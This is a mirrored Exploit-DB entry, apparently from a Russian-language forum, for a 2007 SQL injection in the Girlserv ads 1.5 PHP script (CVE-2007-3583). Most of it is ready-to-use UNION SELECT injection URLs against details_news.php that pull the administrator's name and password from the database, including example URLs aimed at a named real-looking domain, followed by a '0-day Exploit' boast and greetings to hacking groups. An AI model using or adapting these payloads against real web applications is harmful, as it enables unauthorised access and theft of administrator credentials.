- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4142
- Проверка EDB
-
- Пройдено
- Автор
- COLD ZERO
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-3583
- Дата публикации
- 2007-07-03
Код:
Girlserv ads <= 1.5 Remote SQL Injection Vulnerability
Found By : Cold z3ro , [email protected]
Homepages : http://hackteach.org , http://h4ps.com
Script : http://www.girlserv-demo.com/girlserv-ads1.5.zip
For Admin :
/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_name,3,4/**/from/**/admin/**/where%20admin_id=1/*
For password :
/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_password,3,4/**/from/**/admin/**/where%20admin_id=1/*
Example ;
http://www.girlserv.com/ads/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_name,3,4/**/from/**/admin/**/where%20admin_id=1/*
http://www.girlserv.com/ads/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_password,3,4/**/from/**/admin/**/where%20admin_id=1/*
=================================================
0-day Exploit :)
=================================================
Greets : Hackteach members , Pal-hacker.com admins , xp10.com members , and
All friend
=============================================
Cold !F iT z3ro , No One Equal One
=============================================
#Long life Palestine
#http://hackteach.org
# milw0rm.com [2007-07-03]- Источник
- www.exploit-db.com
